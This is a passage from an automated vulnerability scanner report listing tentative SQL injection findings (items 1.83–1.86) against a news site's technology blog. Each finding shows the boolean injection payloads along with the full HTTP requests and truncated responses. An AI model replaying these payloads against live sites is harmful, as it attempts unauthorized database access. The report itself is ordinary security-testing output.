                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/2011/01/24'%20and%201%3d2--%20/5907778-apple-calls-to-award-woman-10k-she-hangs-up HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:31:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39899

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1131262040&do=msnbc.msn.com&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1131262040&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.83. http://technolog.msnbc.redacted/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 87273916%20or%201%3d1--%20 and 87273916%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/201187273916%20or%201%3d1--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=799317169&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=799317169&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

Request 2

GET /_news/201187273916%20or%201%3d2--%20/01/25/5914564-woman-tries-to-smuggle-44-iphones-in-her-stockings HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:28:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1557992197&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1557992197&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

1.84. http://technolog.msnbc.redacted/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_news/2011/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13719482'%20or%201%3d1--%20 and 13719482'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_news/201113719482'%20or%201%3d1--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39911

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1217443745&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=1217443745&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href=
...[SNIP]...

Request 2

GET /_news/201113719482'%20or%201%3d2--%20/01/28/5941311-what-the-egyptian-government-doesnt-want-you-to-see HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:29:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39901

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=908365687&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=908365687&do=msnbc.redacted&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></li>
                   <li class="i13"><a href="http://astrocenter.astrology.redacted">Horoscopes</a></li>
                   <li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li>
                   <li class="i15"><a href="h
...[SNIP]...

1.85. http://technolog.msnbc.redacted/_static/feeds/3147.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/_static/feeds/3147.xml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19701695'%20or%201%3d1--%20 and 19701695'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /_static/feeds19701695'%20or%201%3d1--%20/3147.xml HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 01:24:48 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40121

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=375089076&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=375089076&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

Request 2

GET /_static/feeds19701695'%20or%201%3d2--%20/3147.xml HTTP/1.1
Host: technolog.msnbc.redacted
Proxy-Connection: keep-alive
Referer: http://technolog.msnbc.redacted/_news/2011/01/28/*)(sn=*/?GT1=43001
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; __qca=P0-161320755-1294800573610; P2=pi6=20026; P1=01||,USDC0001|1||WRC|||||||; TZM=-360; s_nr=1294942856289-Repeat; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Sample=69; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350377678

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 01:24:49 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 40109

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=683616817&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>');</script>
<noscript><div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=683616817&do=msnbc.redacted&rf=http%3A%2F%2Ftechnolog.msnbc.msn.com%2F_news%2F2011%2F01%2F28%2F%2A%29%28sn%3D%2A%2F%3FGT1%3D43001&ad=53:9:80;44::;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div></noscript>
<div id="vine-t" class="vine-t vine_M3_template_BridgeTemplate">

<div class="chrome_header">
<header class="top_header">
<div id="network">
   <div class="content">
       <ul id="msn">
           <li class="msnLogo"><a href="http://www.redacted">MSN</a></li>
           <li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a></li>
           <li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
               <ul id="msn-more">
                   <li class="i1"><a href="http://autos.msn.com/">Autos</a></li>
                   <li class="i2"><a href="http://my.redacted/">My MSN</a></li>
                   <li class="i3"><a href="http://video.msn.com/video.aspx?mkt=en-us&from=MSNHP">Video</a></li>
                   <li class="i4"><a href="http://careers.msn.com/">Careers & Jobs</a></li>
                   <li class="i5"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268">Personals</a></li>
                   <li class="i6"><a href="http://local.msn.com/weather.aspx">Weather</a></li>
                   <li class="i7"><a href="http://www.delish.com/">Delish</a></li>
                   <li class="i8"><a href="http://moneycentral.redacted/detail/stock_quote">Quotes</a></li>
                   <li class="i9"><a href="http://msn.whitepages.com/">White Pages</a></li>
                   <li class="i10"><a href="http://zone.redacted/en-us/home">Games</a></li>
                   <li class="i11"><a href="http://realestate.redacted/">Real Estate</a></li>
                   <li class="i12"><a href="http://wonderwall.redacted/">Wonderwall</a></l
...[SNIP]...

1.86. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://technolog.msnbc.redacted
Path:	/blackberry

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10556100%20or%201%3d1--%20 and 10556100%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /blackberry?110556100%20or%201%3d1--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response 1

Request 2

GET /blackberry?110556100%20or%201%3d2--%20=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
